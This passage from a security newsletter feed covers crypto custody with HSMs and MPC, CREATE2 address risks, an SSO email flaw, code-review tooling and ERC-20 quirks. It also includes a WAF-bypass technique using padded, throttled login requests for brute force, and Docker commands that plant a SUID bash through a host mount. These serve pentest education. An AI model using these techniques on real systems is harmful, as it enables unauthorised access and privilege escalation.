So an HSM is basically a physical device that&apos;s specifically designed to generate, store, and protect cryptographic keys. Unlike software wallets that run on regular computers, an HSM is purpose-built hardware with literally one job, and that&apos;s to keep secrets secret.

I like to think of it as a vault with a built-in cryptographic processor. The critical difference is that private keys never leave the device. All signing operations happen inside the module, and only the results (like signatures or encrypted data) actually get exported.

The device itself is tamper-resistant. If you try to open it, it destroys its contents. If you try to read its memory externally, you&apos;ll just find encrypted data. Even the HSM&apos;s own CPU can&apos;t extract keys in plaintext because they&apos;re locked in secure memory with hardware-enforced access controls.

When you need to sign a blockchain transaction, here&apos;s basically what happens. Your application sends the transaction hash to the HSM. Then the HSM validates the request by checking access policies and authentication. The private key signs the hash inside the HSM where nobody can see it or extract it. Only the signature gets returned to your application. Throughout this entire process, the private key stays protected and never leaves the device.

The golden rule here is pretty simple. Keys go into the HSM during initialization and never come out in plaintext. Ever.
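
To make that boundary concrete, here is a toy in-process stand-in for the flow. It is purely illustrative: real HSMs are reached over PKCS#11 or vendor APIs and sign with asymmetric keys, while this sketch uses an HMAC, and Python name mangling is a modelling device rather than tamper resistance. The shape is the point: the key is generated inside the module, policy is checked before signing, and only the signature crosses the boundary.

```python
import hashlib
import hmac
import secrets

class ToyHSM:
    """Illustrative stand-in: the signing key never leaves the object."""

    def __init__(self, max_amount):
        self.__key = secrets.token_bytes(32)  # generated inside the "device"
        self.max_amount = max_amount          # a minimal signing policy

    def sign(self, tx_hash, amount):
        # Policy is evaluated inside the module, before any signing happens.
        if amount > self.max_amount:
            raise PermissionError("policy violation: amount over limit")
        # Only the signature is returned; the key stays inside.
        return hmac.new(self.__key, tx_hash, hashlib.sha256).digest()

hsm = ToyHSM(max_amount=1_000)
digest = hashlib.sha256(b"withdraw 500 to exchange hot wallet").digest()
signature = hsm.sign(digest, amount=500)
print(signature.hex())
```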

## FIPS: The Security Seal That Matters

Most enterprise HSMs are certified under **FIPS 140-2** or **FIPS 140-3** standards. FIPS (Federal Information Processing Standards) is basically a U.S. government security certification program that validates cryptographic modules. The certification has 4 levels of increasing security, but for custody solutions handling serious value, **Level 3 is the bare minimum**. At this level, the device actively detects and responds to physical intrusion attempts by immediately wiping all keys.

## HSM Custody Architectures

In recent audits, I&apos;ve seen HSMs deployed across different custody models. Let me break down the most common architectures and what makes each one tick.

### Exchange Hot Wallets

So centralized exchanges use HSMs to protect hot wallets that process thousands of withdrawals every day. The typical setup has the HSM storing private keys for high-volume addresses while the withdrawal service authenticates and sends transaction hashes to the HSM for signing. The HSM only signs if the request passes all the policy checks, stuff like amount limits, rate limits, and authorized operators. Once it&apos;s signed, the transaction gets broadcast to the network.

Hot wallets need to be online 24/7 for instant withdrawals, which is why HSMs are perfect here. They give you the best balance between accessibility and security. Keys are always available for signing but totally protected from extraction. Major exchanges have publicly stated that their hot wallet keys never exist outside these FIPS Level 3 certified devices. It&apos;s actually a pretty elegant solution when you think about it, because the alternative would be storing keys in software where a single breach could mean game over.

### Institutional Custody Providers

Institutional custody providers basically build their entire infrastructure around HSMs. Client assets get stored in wallets whose keys live exclusively inside these devices. What makes this architecture really interesting is the multi-party approval workflows that get enforced at the HSM level itself. Each withdrawal requires multiple authenticated operators, and the HSM enforces the policy so that no single person can move funds.

A typical institutional setup might require different approval thresholds based on transaction size. Like, smaller withdrawals might need two operators, while larger amounts require three or more. The HSM can also enforce rate limits, like maximum transactions per hour per wallet, and restrict withdrawals to whitelisted destination addresses only. Geographic distribution is super common here too, with HSMs placed in different data centers for redundancy and disaster recovery. I&apos;ve seen setups where moving a significant amount requires people in different countries to coordinate, which sounds inconvenient until you realize that&apos;s exactly the point.

### Cold Storage with HSM-Protected Keys

Cold storage uses HSMs differently, and honestly, this is where things get really interesting from a security perspective. Master keys get generated and stored in air-gapped HSMs that are kept in physically secure vaults like actual bank vaults or secure data centers. When funds need to move, these HSMs get temporarily brought online in secure facilities where the signing ceremony occurs inside the device. Once that&apos;s done, the devices immediately return to offline storage.

Some organizations take this even further with geographically distributed HSMs for cold storage. Key shards get stored in HSMs across multiple continents, which means you need physical presence at multiple locations to sign transactions. This gives you protection against single-site compromise or natural disasters. It&apos;s essentially a physical manifestation of threshold security. Sure, it makes moving funds way more complex, but when you&apos;re protecting hundreds of millions or billions in assets, that complexity is a feature, not a bug.

### Other Use Cases

Beyond these primary custody models, HSMs pop up in all sorts of other blockchain applications. Stablecoin issuers use them to protect the keys that control mint and burn operations, which makes sure that no unauthorized token creation can happen. Companies tokenizing real-world assets rely on HSMs for administrative contract keys and treasury management operations.

Payment processors and merchant services that handle crypto transactions use HSMs to automate signing for high-volume, low-value transactions while keeping security standards high. Even some DAOs and protocol governance systems have started incorporating HSMs into their multisig setups to add an extra layer of security for protocol-owned value. The technology is flexible enough that once you understand the basics, you start seeing use cases everywhere.

## The Evolution: MPC Custody

The custody landscape is evolving beyond traditional HSMs. **Multi-Party Computation (MPC)** is gaining serious traction as an alternative approach, and honestly, it&apos;s one of the more fascinating developments I&apos;ve been tracking.

### How MPC Works

So instead of storing a complete private key in one place, MPC splits the key into **multiple shards** that get distributed across different parties or servers. The key itself never exists in complete form, not even during signing. Let me explain how this actually works in practice.

When a transaction needs to be signed, each party computes their portion of the signature using their key shard. These partial signatures then get combined mathematically to produce a valid signature, as if a complete key had signed it. But here&apos;s the really clever part, and this blew my mind when I first learned about it. The full key never materializes at any point in the process. It&apos;s like having a secret that nobody fully knows, yet everyone can collectively use.
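
A stripped-down numeric sketch of that idea (toy modular arithmetic of my own, not a real threshold ECDSA or Schnorr protocol): because the toy scheme is linear, each party signs with only its additive shard, and the combined result equals what the full key would have produced, even though the full key is never assembled.

```python
import secrets

q = 2**127 - 1  # toy modulus standing in for a group order

def split_key(key, parties):
    """Additive sharing: shards sum to the key mod q; no shard reveals it."""
    shards = [secrets.randbelow(q) for _ in range(parties - 1)]
    shards.append((key - sum(shards)) % q)
    return shards

def partial_sign(shard, msg_hash):
    # Each party computes its share of the signature using only its shard.
    return (shard * msg_hash) % q

full_key = secrets.randbelow(q)
shards = split_key(full_key, parties=3)
msg_hash = 0xDEADBEEF

combined = sum(partial_sign(s, msg_hash) for s in shards) % q
assert combined == (full_key * msg_hash) % q  # matches a full-key signature
print("combined signature matches; the full key was never reassembled")
```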

### MPC vs HSM: The Trade-offs

Traditional HSMs have been the gold standard for decades because they come with proven FIPS certifications that regulators actually recognize and trust. They offer rock-solid physical protection and there&apos;s a mature ecosystem of vendors and support. But they have this fundamental limitation. If someone compromises the HSM, it&apos;s game over. All your keys are sitting in one place. They&apos;re also pretty expensive, typically costing anywhere from $10k to $50k per device plus ongoing maintenance, and they tie you to specific physical locations.

MPC takes a completely different approach. By distributing key shards across multiple parties or locations, there&apos;s no single point of failure anymore. If one shard gets compromised, the attacker basically gets nothing useful. MPC is also way more operationally flexible, which is perfect for distributed teams working remotely across different time zones. Since it can be implemented in software, the infrastructure costs are generally lower, and updating or rotating key shares is more straightforward than physically managing HSM devices.

But MPC isn&apos;t without its challenges. The technology is newer, which means it lacks the decades of battle-testing and regulatory acceptance that HSMs have. There&apos;s no FIPS equivalent for MPC yet, which can be a real blocker when you&apos;re dealing with regulated financial institutions or government contracts. Implementation complexity is also very real. Getting the cryptography right is way harder than just plugging in a certified HSM. And in some jurisdictions, regulators are still trying to figure out how to classify and regulate MPC-based custody solutions.

### The Hybrid Approach

The current trend I&apos;m seeing is what I&apos;d call the best of both worlds approach. Instead of picking one or the other, leading custody providers are combining both technologies into what we call **MPC + HSM hybrid architectures**.

The concept is pretty straightforward but really powerful. Each MPC key shard gets stored inside its own HSM. So you get distributed trust from MPC combined with hardware security from HSMs. Like, you might have a 5-of-9 threshold where each of the 9 shards lives in a different HSM in a different location.

This hybrid model is becoming the gold standard for institutional custody because it basically checks all the boxes. Regulators understand and trust FIPS-certified HSMs. MPC provides the resilience and distribution that modern custody actually needs. And it gives you operational flexibility for geographically distributed teams. When you&apos;re protecting assets worth millions or billions, spending a bit extra to combine both approaches just makes sense.

Thanks for reading. Hope this gives you a clearer picture of how institutional custody actually works under the hood. The next time you see &quot;enterprise-grade custody&quot; in some marketing material, you&apos;ll know what questions to ask.

See you in the next one!

Stay sharp,  
Ruben</content:encoded><category>Newsletter</category><category>active-directory</category><author>Ruben Santos</author></item><item><title>Predictable Contracts: Understanding CREATE and CREATE2 in Ethereum</title><link>https://www.kayssel.com/newsletter/issue-18</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-18</guid><description>How deterministic addresses unlock powerful features and subtle attack vectors auditors should never overlook.</description><pubDate>Sun, 05 Oct 2025 15:10:07 GMT</pubDate><content:encoded>Hi everyone,

In this edition I want to dive into something that sits at the core of Ethereum: how contract addresses are generated. If you’ve ever wondered how attackers can predict where a smart contract will live _before_ it’s even deployed, this one’s for you.

# The Classic Way: `CREATE`

Traditionally, contracts are deployed with the `CREATE` opcode. Solidity handles this every time you write:

```solidity
MyContract c = new MyContract();

```

Under the hood, the EVM computes the new address as:

```solidity
keccak256(rlp([sender, nonce]))[12:]

```

Where:

-   **sender** = the deployer’s address
-   **nonce** = the deployer’s transaction count

This means that if you know an account’s address and nonce, you can deterministically calculate where its next contract will be deployed.

# The New Paradigm: `CREATE2`

Introduced with [EIP-1014](https://eips.ethereum.org/EIPS/eip-1014), the `CREATE2` opcode gives developers more control. Solidity exposes it with:

```solidity
new MyContract{salt: _salt}();

```

&lt;details&gt;
&lt;summary&gt;Under the hood, the EVM computes the address as:&lt;/summary&gt;

```solidity
keccak256(0xff ++ sender ++ salt ++ keccak256(init_code))[12:]

```
&lt;/details&gt;


-   **salt** = a user-provided value
-   **init\_code** = the contract’s creation bytecode

This allows developers to precompute an address before the contract exists, a key feature for counterfactual contracts, meta-transactions, and smart wallets.
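
To see the mechanics, here is a sketch of the derivation with Python&apos;s SHA3-256 standing in for keccak-256. Note that the two differ in padding, so these are not real Ethereum addresses; swap in an actual keccak-256 implementation for real ones. The sample `sender` and `init_code` bytes are arbitrary values for the demo. What it illustrates is the key property: the address depends only on deployer, salt, and init code, never on a nonce, so anyone can compute it before deployment.

```python
import hashlib

def h(data):
    # Stand-in hash: real CREATE2 uses keccak-256, NOT NIST SHA3-256.
    return hashlib.sha3_256(data).digest()

def create2_address(sender, salt, init_code):
    # keccak256(0xff ++ sender ++ salt ++ keccak256(init_code))[12:]
    return h(b"\xff" + sender + salt + h(init_code))[12:]

sender = bytes.fromhex("00" * 20)                     # hypothetical deployer
salt = (42).to_bytes(32, "big")
init_code = bytes.fromhex("600a600c600039600a6000f3")  # arbitrary demo bytes

# Deterministic: the same inputs always give the same 20-byte address.
print(create2_address(sender, salt, init_code).hex())
```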

# Risks and Attack Scenarios

While powerful, both `CREATE` and `CREATE2` introduce interesting risks. Some ideas that usually come to mind when reviewing contracts that rely on these patterns are:

-   🔒 **Front-running &amp; squatting:** attackers can preemptively deploy contracts at addresses others plan to use.
-   👻 **Shadow contracts:** malicious contracts can be deployed at expected addresses if salts aren’t carefully controlled.
-   ♻️ **Code replacement:** with `CREATE2`, a contract can be destroyed and redeployed at the same address, which is dangerous if external systems assume code immutability.
-   💸 **Value pre-funding abuse:** attackers can send ETH to precomputed addresses (even if no contract is deployed there) to change assumptions, grief users, or create unexpected states. This is low-cost and often overlooked; protocols that implicitly assume a zero balance or an unused address can be tripped up by simple pre-funding.

# Mitigation Tips

On the other hand, some good practices that could be applied here are:

-   🧂 **Use unique, unpredictable salts** when working with `CREATE2` to avoid predictable deployments or collisions.
-   🔒 **Guard against re-initialization** in contracts that might be redeployed (e.g., use initialization flags tied to constructor arguments or immutable codehash checks).
-   💰 **Don’t rely on zero-balance assumptions:** explicitly check the code hash (`extcodehash`) and verify that `address.balance` is within expected bounds.
-   ⏳ **Reserve counterfactual addresses safely:** consider time-locked reservations or an on-chain registration step before allowing sensitive actions.
-   🧪 **Test pre-funded scenarios**: include cases where the target address already holds ETH or ERC20 tokens.
-   📝 **Verify the bytecode hash** if immutability is assumed: `CREATE2` allows redeployment at the same address.

Thanks for reading, hope this gives you a few new angles to test in your own reviews.  
See you in the next one!

Stay sharp,  
Ruben</content:encoded><category>Newsletter</category><category>web3-security</category><author>Ruben Santos</author></item><item><title>The Day an Email Broke Single Sign-On</title><link>https://www.kayssel.com/newsletter/issue-17</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-17</guid><description>Exploiting weak email validation in OAuth2 SSO</description><pubDate>Sun, 28 Sep 2025 17:26:23 GMT</pubDate><content:encoded>Hi everyone,

In this edition I want to share something a bit different, focused on authentication in web applications. It’s a neat trick that I think is worth testing in your own engagements. Hope you enjoy it!

# The story

When dealing with authentication and single sign-on (SSO) systems, email addresses are often used as unique identifiers. This makes sense because they are easy to validate and naturally unique for most users. However, using emails as identifiers without carefully designing how they are handled can introduce unexpected risks.

One common issue arises when applications allow changes to critical identifiers like email addresses without proper validation. If login logic is tied to these identifiers, attackers can abuse the process to disrupt normal access or even escalate their privileges.

A couple of months ago I found a real example of this during a security review of an OAuth2 single sign-on system. At first glance everything seemed fine. Companies, or tenants, could register wallets for their users, and each tenant could add multiple accounts. Emails were treated as unique across the platform. If one tenant had already registered an email, no other tenant could use the same one. The system would reject the attempt and show an error saying the user already existed.

The protection looked solid, but there was a flaw. The restriction only applied at registration time. When editing an account, the platform allowed the email to be changed to one that was already in use. No validation checks were performed.

Because the system was based on SSO, the login flow became much more dangerous. The platform always prioritized the account that had been created first when deciding where to log a user in.

This design opened the door to two serious attack scenarios.

1.  **Denial of Service (DoS)**  
    An attacker could create an account before the victim and later change its email to match the victim’s. From that moment on, the login flow would always resolve to the attacker’s tenant. The victim would be locked out of their real account and unable to access their company environment.
2.  **Privilege Escalation**  
    Within a single tenant, the same logic allowed privilege escalation. If an attacker registered a normal account before an administrator was created, they could later update their email to the administrator’s. Since the older account took precedence, every login would grant the attacker administrator rights instead of regular user privileges.
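
The broken resolution logic boils down to something like the following toy reconstruction (my own naming, not the audited codebase): registration enforces email uniqueness, the edit path does not, and login resolves an email to the oldest matching account.

```python
from dataclasses import dataclass

@dataclass
class Account:
    account_id: int  # creation order: lower id means older account
    email: str
    role: str

accounts = []

def register(email, role):
    if any(a.email == email for a in accounts):
        raise ValueError("user already exists")  # uniqueness enforced here...
    account = Account(len(accounts), email, role)
    accounts.append(account)
    return account

def change_email(account, new_email):
    account.email = new_email  # ...but not here: the missing check

def login(email):
    # "First account wins": the oldest match decides where the login lands.
    return min((a for a in accounts if a.email == email),
               key=lambda a: a.account_id)

attacker = register("attacker@corp.com", "user")  # registered first
admin = register("admin@corp.com", "admin")
change_email(attacker, "admin@corp.com")          # duplicate slips through

print(login("admin@corp.com").role)  # prints: user (the attacker's account)
```

From this point every login for the admin&apos;s email resolves to the attacker&apos;s older account, which is exactly the primitive behind both scenarios above.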

A small oversight in email validation combined with the “first account wins” rule in the SSO logic turned into a powerful vulnerability.

A small story, but I think it’s a useful tip that often goes untested and can lead to serious trouble. See you in the next one!

Stay sharp,  
Ruben</content:encoded><category>Newsletter</category><category>web3-security</category><author>Ruben Santos</author></item><item><title>Taming the Beast: Practical Code Review with Security Tools</title><link>https://www.kayssel.com/newsletter/issue-16</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-16</guid><description>From endless lines of code to streamlined reviews with TruffleHog, CodeQL, and Trivy.</description><pubDate>Sun, 21 Sep 2025 08:06:22 GMT</pubDate><content:encoded>Hi everyone!

Over the past few weeks, I&apos;ve been working on a large and complex code review project. Along the way, I came across a few tools and tips that proved really valuable during a pentest. In this edition, I&apos;d like to share them with you. Hopefully, you&apos;ll find them just as useful in your own work 😄

# Know the architecture

The most important step is to understand what you&apos;re up against. I usually start by asking for any architecture or design diagrams the team can provide. The clearer the picture, the better. From there, I can begin building a threat model, asking myself questions such as:

-   Are they encrypting sensitive data in the database?
-   Are secrets hardcoded in the codebase?
-   What possible edge cases could exist?

Nowadays, most developers rely on CI/CD tools to catch common security issues in code. That means your best chance to add value is by looking for business logic vulnerabilities, and that&apos;s why understanding the full architecture is so important.

# CodeQL

Once you have a basic understanding of the architecture and threat model, it&apos;s a good idea to run tools that check for common issues. One of my favorites is CodeQL.

CodeQL works by running queries against a repository you define, looking for vulnerabilities in a specific programming language. You can do this with the CodeQL CLI in two main steps:

1.  Create a database from the repository
2.  Run queries against the database

Here&apos;s a minimal example:

```bash
# Step 1: Create the CodeQL database
codeql database create my-database \
  --language=javascript \
  --source-root=/path/to/repo

# Step 2: Analyze the database with the experimental query suite
codeql database analyze my-database \
  codeql/javascript-queries:codeql-suites/javascript-security-experimental.qls \
  --format=sarif-latest \
  --output=results.sarif
```

Query suites such as `javascript-security-experimental.qls` live in the official [CodeQL GitHub repository](https://github.com/github/codeql/blob/main/javascript/ql/src/codeql-suites/javascript-security-experimental.qls). They often include checks that are not part of the default suite but can highlight interesting edge cases or experimental rules.

Once you have your results in `.sarif` format, you can open them locally in Visual Studio Code using the [Sarif Viewer](https://marketplace.visualstudio.com/items?itemName=MS-SarifVSCode.sarif-viewer) extension, which provides a clear interface to explore findings directly from your editor.

The cool thing about CodeQL is that it lets you trace issues back through the code flow, so you can understand why they were introduced.

⚠️ **Note**: CodeQL’s free use is limited to open source projects. For private repositories, you’ll need a GitHub Advanced Security license.

# Semgrep

This is the second tool that I use the most. In my opinion, it&apos;s not as strong as CodeQL, but it&apos;s still very effective. Semgrep relies on pattern matching (regex-like rules) to identify issues in code, and it&apos;s much more straightforward to set up and run.

Here&apos;s a simple example of how to use it:

```bash
# Install Semgrep (if not already installed)
pip install semgrep

# Run Semgrep against a Go project using the Golang ruleset
semgrep --config p/golang /path/to/repo

```

You can explore the available rules directly on their website: [https://semgrep.dev/p/golang](https://semgrep.dev/p/golang)

# TruffleHog

Now that we have a basic understanding of the possible issues in the code, the next step is to try to detect secrets that may be hardcoded in the target&apos;s GitHub repo. For this, the best tool in my opinion is TruffleHog. It&apos;s quite straightforward to run. Since I&apos;m usually testing private repos, the only command I run is the following:

```bash
trufflehog git file://test_keys --results=verified,unknown
```

Another interesting thing you can do, if you have the binary of the code you are auditing, is run the `strings` command-line tool to search for secrets as well.

# Trivy

The last tool you may want to use, if the deployment of your target is in scope, is **Trivy**. Trivy allows you to find misconfigurations in things like Dockerfiles or Kubernetes, so it&apos;s quite useful. You can run it directly using:

```bash
trivy fs --scanners vuln,secret,misconfig myproject/
```

# Wrapping up

That&apos;s all for now! I hope you picked up something useful in this chapter. Code review isn&apos;t exactly my idea of a fun Friday night; most projects come with thousands of lines of code that look like they were written by caffeinated squirrels, but with the right tools, the whole process becomes a lot less painful (and maybe even survivable).

See you in the next one.  
Stay sharp,  
Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Bypassing Cloud Firewalls: Size Does Matter</title><link>https://www.kayssel.com/newsletter/issue-15</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-15</guid><description>Bypassing Akamai, CloudFront &amp; Cloudflare with oversized requests.</description><pubDate>Sun, 14 Sep 2025 09:33:42 GMT</pubDate><content:encoded>Hey everyone 👋

This week I want to switch gears from smart contracts and dive back into something more web-app flavored: firewall bypass techniques in cloud environments. If you’ve ever tested apps behind Akamai, AWS CloudFront, or Cloudflare, you’ve probably noticed how resilient they can be against classic attacks. Rate-limiting, WAF signatures, bot protections… the whole package.

But here’s the catch: most of these protections are still “size-sensitive.” In other words, how you shape your request can determine whether it’s blocked or allowed through.

# Why Size Matters

Many WAFs [set thresholds for request length or body size](https://blog.1nf1n1ty.team/hacktricks/pentesting-web/proxy-waf-protections-bypass#request-size-limits). Too short and it looks suspicious; too long and it might be truncated or ignored. Clever attackers exploit this to sneak payloads past filtering layers.

What makes this interesting is that bypasses often don’t affect the whole app, but only specific endpoints. A typical example: the `/login` endpoint. It usually has stricter protections (blocking brute-force attempts or filtering payloads). With size-based evasion, you can sometimes slip through those controls and suddenly brute-force passwords on a page that looked bulletproof.

On top of that, some WAFs add a second defense mechanism: rate limiting. If you send too many requests too quickly, you’ll get blocked, even if your payloads are well-shaped. The trick? Tools like Burp Suite or Nuclei let you tune the request rate. Simply slowing down your attack to stay under the radar can be enough to bypass these protections.

## Example Request

```http
POST /login HTTP/1.1
Host: target-app.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 8450   ← 👈 Notice: body size &gt;8KB, may bypass inspection

username=admin&amp;password=pass123
&amp;padding=AAA[...]AAA   ← 👈 Artificial padding to increase request size

```

In this example, the Content-Length is deliberately set above 8KB and the request body is inflated with dummy data (`AAA[...]AAA`). Some WAFs won’t fully inspect payloads past a certain size, which allows attackers to sneak through.
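To probe this systematically, you can generate padded requests programmatically (a Python sketch; the endpoint, field names, and the 8 KB threshold are assumptions to tune per target):

```python
from urllib.parse import urlencode

# Build a /login body inflated past a hypothetical 8 KB inspection cap.
def padded_login_body(username, password, pad_to=8500):
    padding = "A" * pad_to
    return urlencode({"username": username, "password": password,
                      "padding": padding})

body = padded_login_body("admin", "pass123")
headers = (
    "POST /login HTTP/1.1\r\n"
    "Host: target-app.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: " + str(len(body)) + "\r\n\r\n"
)
raw_request = headers + body
assert len(body) > 8500  # payload now exceeds the assumed cap
```

Replay `raw_request` over a raw socket or paste it into Burp Repeater, then compare responses at different `pad_to` values to locate the inspection cap.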

# Practical Tips

-   **Identify the WAF first** → Look at response headers (e.g., `server: AkamaiGHost`, `x-cache`, `cf-ray`, etc.) or use `dig` to check DNS mappings and confirm what service sits in front of the app.
-   **Vary request sizes systematically** → 1KB, 10KB, 100KB, 1MB. Watch what breaks or slips through.
-   **Play with chunked transfer encoding** → Splitting payloads into pieces may bypass reassembly limits.
-   **Test edge cases** → Minimum valid request, maximum allowed request, and right around known inspection caps.
-   **Adjust your rate** → If the WAF has per-second request controls, just throttle your tool (Burp, Nuclei, ffuf) to fly under the radar.

# Wrapping Up

Firewalls in the cloud are strong, but they’re not perfect. Their need to balance security vs. performance often introduces blind spots, and size-based bypasses are a classic example. For auditors, it’s a reminder: don’t just test functionality broadly; target those “sensitive” endpoints like login, signup, or password reset where controls are strictest. That’s usually where size tricks and careful throttling have the biggest payoff.

Stay sharp 🕶️  
Ruben</content:encoded><category>Newsletter</category><category>web-security</category><category>cloud-security</category><author>Ruben Santos</author></item><item><title>ERC-20s in the Wild: Why Vanilla Assumptions Break</title><link>https://www.kayssel.com/newsletter/issue-14</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-14</guid><description>When ERC-20s Don’t Play Nice</description><pubDate>Sat, 06 Sep 2025 09:00:07 GMT</pubDate><content:encoded>Hey everyone 👋

I’m back from a short vacation and diving straight into smart contract audits again.

This week there’s also a brand-new chapter in the Docker security series 🐳. If you’re into container security, I’m covering practical Docker breakout techniques along with some progress updates on Valeris, the tool I’m building in Rust to explore these scenarios. If that sounds interesting, make sure to check it out before diving into today’s smart contract topic!

[When Containers Lie: Escaping Root and Breaking Docker Isolation](https://www.kayssel.com/post/docker-security-2/)

One thing I’ve noticed over and over is how often protocols assume ERC-20s behave like “vanilla” tokens. You know, simple `balanceOf`, `transfer`, `transferFrom` … nothing fancy.  
But first, let’s quickly recap what an ERC-20 is. In short, it’s a token standard on Ethereum that defines a common interface for fungible assets. This means any token that follows the ERC-20 rules can be used interchangeably by wallets, exchanges, and protocols. At its core, an ERC-20 keeps track of balances and allows transfers between accounts. It also defines functions like `approve` and `transferFrom` so contracts can move tokens on behalf of users. The whole point is interoperability: if every token speaks the same “language”, developers can build without worrying about the specific implementation of each asset.

The catch is that not every ERC-20 sticks to this “vanilla” model. Some introduce quirks or edge cases that can completely break integrations if you don’t account for them.

Let’s go through some of the most common troublemakers.

## Fee-on-Transfer Tokens

Some tokens apply a fee on every transfer. You might try to send 100 tokens, but the recipient only ends up with 95. This breaks assumptions in many protocols that expect one-to-one transfers. Accounting, reward distribution, and balance checks often fail when the received amount is smaller than expected.
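The accounting mismatch is easy to see in a toy model (Python; the 5% fee is an arbitrary example, not any specific token):

```python
class FeeOnTransferToken:
    """Toy ERC-20-like token that skims a 5% fee on every transfer
    (arbitrary rate, integer math as in Solidity)."""
    FEE_BPS = 500  # 5% in basis points

    def __init__(self):
        self.balances = {}

    def transfer(self, src, dst, amount):
        fee = amount * self.FEE_BPS // 10_000
        self.balances[src] = self.balances.get(src, 0) - amount
        self.balances[dst] = self.balances.get(dst, 0) + amount - fee
        return amount - fee

token = FeeOnTransferToken()
token.balances["user"] = 100

# A naive vault credits the *sent* amount instead of measuring its own
# balance before and after the transfer.
credited = 100
received = token.transfer("user", "vault", 100)
assert received == 95
assert credited - token.balances["vault"] == 5  # books overstate by the fee
```

The robust integration pattern is to credit `balance_after - balance_before` rather than the amount passed to `transfer`.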

## Reverting on Zero Transfers

In vanilla tokens, transferring zero is harmless and often used by protocols as a quick sanity check. However, some implementations revert if you try to transfer zero. Suddenly, batch transfers or loops that assume zero-value transfers succeed will start failing.

## Rebasing or Elastic Supply Tokens

Rebasing tokens change balances automatically, either increasing or decreasing them to maintain certain supply dynamics. This can completely throw off systems that rely on static accounting. Governance systems or lending protocols that depend on exact balance snapshots can break because user balances shift outside of their control.

## Burn-on-Transfer or Deflationary Tokens

Some tokens burn part of the amount being transferred. Over time, this chips away at supply and confuses contracts that assume transfers are lossless. Reward systems, accounting models, and treasuries may miscalculate values as a result.

## Tokens That Don’t Return a Boolean

The ERC-20 spec says transfer should return a boolean, but early tokens like USDT don’t follow this rule. If your contract uses the raw IERC20 interface and expects a return value, things can fail silently. Libraries like OpenZeppelin’s SafeERC20 patch this issue, but it’s always important to verify the behavior of the specific token.

## Wrapping Up

When building or auditing protocols, don’t just assume you’re dealing with a vanilla ERC-20. The reality is that fees, burns, rebases, frozen accounts, or missing return values are all out there in production tokens. If your system isn’t prepared, it will eventually fail when faced with these variations.

That’s why one of the safest design choices is to avoid supporting arbitrary tokens altogether. Instead of accepting any ERC-20, build a curated list of approved assets. Expanding this list gradually, after testing each token type, reduces the attack surface and avoids hidden edge cases that can cost real money.

That’s it for this week, stay sharp out there 🕶️  
Ruben

## References

I usually don’t share references in the newsletter because it’s more of a “personal experience” thing, but I thought I’d share two articles that are quite interesting if you’d like to dive deeper into these topics.

-   Fee on transfer &amp; Rebase Tokens. [https://medium.com/@0xnolo/fee-on-transfer-rebase-tokens-an-erc-20-security-bug-you-need-to-know-f4e5badea1ee](https://medium.com/@0xnolo/fee-on-transfer-rebase-tokens-an-erc-20-security-bug-you-need-to-know-f4e5badea1ee)
-   ERC-20 Token Security: What You Need to Consider. [https://medium.com/thesis-defense/erc20-token-security-what-you-need-to-consider-46ab8231a050](https://medium.com/thesis-defense/erc20-token-security-what-you-need-to-consider-46ab8231a050)</content:encoded><category>Newsletter</category><category>code-review</category><author>Ruben Santos</author></item><item><title>When Containers Lie: Escaping Root and Breaking Docker Isolation</title><link>https://www.kayssel.com/post/docker-security-2</link><guid isPermaLink="true">https://www.kayssel.com/post/docker-security-2</guid><description>We explore how root containers and host mounts enable privilege escalation, from SUID binaries in shared volumes to abusing /proc/&lt;PID&gt;/root. Then we show how Valeris detects these risky setups with YAML-based rules before they lead to full host compromise.</description><pubDate>Sat, 06 Sep 2025 08:59:24 GMT</pubDate><content:encoded># TL;DR

-   Spin up intentionally vulnerable Docker containers to see how root users and host mounts can lead to privilege escalation.
-   Walk through two real attack scenarios: abusing a shared host directory and leveraging `/proc/&lt;PID&gt;/root` with matching UIDs.
-   Learn why running containers as root is far more dangerous than it looks.
-   See how Valeris now detects these misconfigurations with YAML-based templates instead of Rust code, making it easier to extend without recompiling.
-   Check out the new update mechanism and detectors, including the `root_user` rule that flags containers running as root.

# From Theory to Practice

Last time we explored how containers work in theory. Namespaces, cgroups and OverlayFS are kernel tricks that make processes feel isolated. But theory rarely survives contact with the real environment.

In this chapter we are going to look at privilege escalation scenarios that often show up during engagements. Imagine you have landed on a box as a low-privileged user. You start your recon and there it is, Docker is installed. Even better, your user is in the `docker` group or the socket is world accessible.

At this point the playbook writes itself. You spin up a container. By default it runs as root, which means you now control a process the kernel considers root. Combine that with a sloppy host mount or a misconfigured container already running as root and suddenly you have a straight path to the host.

These are not rare edge cases. In real-world assessments you will find:

-   Dev boxes where engineers launch containers as root because “it is faster”
-   Shared environments with host directories mounted to containers for debugging
-   Systems where being able to run Docker as a normal user is basically equivalent to being root on the host

In this chapter we will recreate those misconfigurations on purpose. We will walk through two classic privilege escalation paths, one with a host mount and another with `/proc/&lt;PID&gt;/root` and matching UIDs, and show how they lead to full compromise. Then we will run Valeris against them to see how these risks can be detected automatically using its new YAML based detectors.

# Privilege Escalation - First Pattern

This scenario only becomes possible when two conditions are met:

1.  The attacker has root inside the container.
2.  There is a mounted host directory shared with that container.

Those two ingredients are enough to turn a simple shared folder into a privilege escalation path.

## Preparing the host environment

&lt;details&gt;
&lt;summary&gt;On the host we create a directory that will be mounted into the container:&lt;/summary&gt;

```bash
mkdir /tmp/hostshare
touch /tmp/hostshare/test.txt
ls -l /tmp/hostshare

```
&lt;/details&gt;


![](/content/images/2025/09/image.png)

Creating the shared directory

## Running the container as root with a mounted volume

We then launch a new Ubuntu container. Docker defaults to running it as root, and we mount our host directory into `/mnt`, so both conditions are satisfied:

```bash
docker run -it --rm \
  --name vuln-root \
  -v /tmp/hostshare:/mnt \
  ubuntu bash

```

![](/content/images/2025/09/image-1.png)

Running container as root

Inside the container, as root, we can freely access the shared `/mnt` directory.

## Planting a SUID binary from the container

From the host, we copy its `bash` binary into the shared folder (so the binary links against the host’s libraries); then, with root privileges inside the container, we change its ownership and set the SUID bit:

```bash
cp /bin/bash ./bash      # host: copy the binary
chown root:root bash     # container: set owner to root
chmod 4777 bash          # container: set SUID

```

